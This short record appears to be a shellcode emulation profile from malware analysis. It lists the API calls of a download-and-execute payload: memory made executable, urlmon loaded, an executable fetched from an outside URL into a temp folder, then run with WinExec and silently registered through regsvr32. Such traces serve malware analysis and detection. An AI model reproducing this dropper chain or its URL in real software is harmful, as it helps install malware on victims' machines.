- [Shellcode Profile]
- BOOL VirtualProtectEx (
- HANDLE = 0x03d8f2e0 =>
- none;
- LPCVOID = 0x03d8f3a0 =>
- none;
- DWORD dwSize = 255;
- DWORD flNewProtect = 64;
- PDWORD lpflOldProtectt = 64;
- ) = 0x1;
- HMODULE LoadLibraryA (
- LPCTSTR = 0x03d8f730 =>
- = "urlmon";
- ) = 0x7df20000;
- DWORD GetTempPathA (
- DWORD nBufferLength = 248;
- LPTSTR = 0x03d8f9e0 =>
- = "c:\tmp\";
- ) = 0x7;
- HRESULT URLDownloadToFile (
- LPUNKNOWN = 0x03d8fcb0 =>
- none;
- LPCTSTR = 0x03d8fd70 =>
- = "http://frequent.dwyane-wade.org/news/opinion-toss9.exe";
- LPCTSTR = 0x03d8feb0 =>
- = "c:\tmp\wpbt0.dll";
- DWORD dwReserved = 0;
- LPBINDSTATUSCALLBACK lpfnCB = 0;
- ) = 0x0;
- UINT WINAPI WinExec (
- LPCSTR = 0x03d90180 =>
- = "c:\tmp\wpbt0.dll";
- UINT uCmdShow = 0;
- ) = 0x20;
- UINT WINAPI WinExec (
- LPCSTR = 0x03d90440 =>
- = "regsvr32 -s c:\tmp\wpbt0.dll";
- UINT uCmdShow = 0;
- ) = 0x20;